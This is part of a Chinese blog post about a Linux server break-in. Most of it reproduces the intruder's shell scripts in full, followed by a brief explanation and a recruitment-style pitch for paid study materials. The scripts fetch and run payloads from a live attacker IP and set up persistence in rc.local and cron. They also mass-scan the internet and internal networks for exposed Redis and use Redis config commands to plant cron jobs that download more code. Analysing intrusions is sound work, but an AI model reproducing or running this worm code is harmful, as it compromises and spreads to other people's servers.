记一次Linux被入侵，服务器变(2)，带你快速通过字节跳动面试

fi

sleep 1

echo 1 > .watch

sleep 1

ps x | awk ‘!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}’ | xargs kill -9 2>/dev/null

ps x | awk ‘!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}’ | xargs kill -9 2>/dev/null

sleep 1

if ! [ -x /usr/bin/gpg-agentd ]; then

curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db

echo ‘/usr/bin/gpg-agentd’ > /etc/rc.local

echo ‘curl -fsSL 159.89.190.243/ash.php|sh’ >> /etc/rc.local

echo ‘exit 0’ >> /etc/rc.local

fi

sleep 1

chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd

sleep 1

if ! [ -x “$(command -v masscan)” ]; then

rm -rf /var/lib/apt/lists/*

rm -rf x1.tar.gz

if [ -x “$(command -v apt-get)” ]; then

export DEBIAN_FRONTEND=noninteractive

apt-get update -y

apt-get install -y debconf-doc

apt-get install -y build-essential

apt-get install -y libpcap0.8-dev libpcap0.8

apt-get install -y libpcap*

apt-get install -y make gcc git

apt-get install -y redis-server

apt-get install -y redis-tools

apt-get install -y redis

apt-get install -y iptables

apt-get install -y wget curl

fi

if [ -x “$(command -v yum)” ]; then

yum update -y

yum install -y epel-release

yum update -y

yum install -y git iptables make gcc redis libpcap libpcap-devel

yum install -y wget curl

fi

sleep 1

curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz

sleep 1

[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd … && rm -rf masscan-1.0.4

fi

sleep 3 && rm -rf .watch

bash -c ‘curl -fsSL 159.89.190.243/rsh.php|bash’ 2>/dev/null

这段脚本的代码比较长，但主要的功能有 4 个：

• 下载远程代码到本地，添加执行权限，chmod u+x。

• 修改 rc.local，让本地代码开机自动执行。

• 下载 Github 上的开源扫描器代码，并安装相关的依赖软件，也就是我上面的 Messages 里看到的记录。

• 下载第三个脚本，并且执行。

我去 Github 上看了下这个开源代码，简直吊炸天：

Transmitting 10 Million Packets Per Second(每秒发送 1000 万个数据包)，比 nmap 速度还要快，这就不难理解为什么阿里云把服务器冻结了。

大概看了下 Readme 之后，我也没有细究，继续下载第三个脚本：

setenforce 0 2>/dev/null

ulimit -n 50000

ulimit -u 50000

sleep 1

iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null

iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null

sleep 1

rm -rf .dat .shard .ranges .lan 2>/dev/null

sleep 1

echo ‘config set dbfilename “backup.db”’ > .dat

echo ‘save’ >> .dat

echo ‘flushall’ >> .dat

echo ‘set backup1 “\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup2 “\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup3 “\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup4 “\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘config set dir “/var/spool/cron/”’ >> .dat

echo ‘config set dbfilename “root”’ >> .dat

echo ‘save’ >> .dat

echo ‘config set dir “/var/spool/cron/crontabs”’ >> .dat

echo ‘save’ >> .dat

sleep 1

masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .shard

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .shard

sleep 1

masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .ranges

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .ranges

sleep 1

ip a | grep -oE ‘([0-9]{1,3}.?){4}/[0-9]{2}’ 2>/dev/null | sed ‘s//([0-9]{2})//16/g’ > .inet

sleep 1

masscan --max-rate 10000 -p6379,6380 -iL .inet | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .lan

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .lan

sleep 60

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Linux运维工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Linux运维全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Linux运维知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip1024b （备注Linux运维获取）

最后的话

最近很多小伙伴找我要Linux学习资料，于是我翻箱倒柜，整理了一些优质资源，涵盖视频、电子书、PPT等共享给大家！

资料预览

给大家整理的视频资料：

给大家整理的电子书资料：

如果本文对你有帮助，欢迎点赞、收藏、转发给朋友，让我有持续创作的动力！

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

10)]

给大家整理的电子书资料：

[外链图片转存中…(img-9lUdP4NT-1712650326910)]

如果本文对你有帮助，欢迎点赞、收藏、转发给朋友，让我有持续创作的动力！

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-8ksPgE3w-1712650326910)]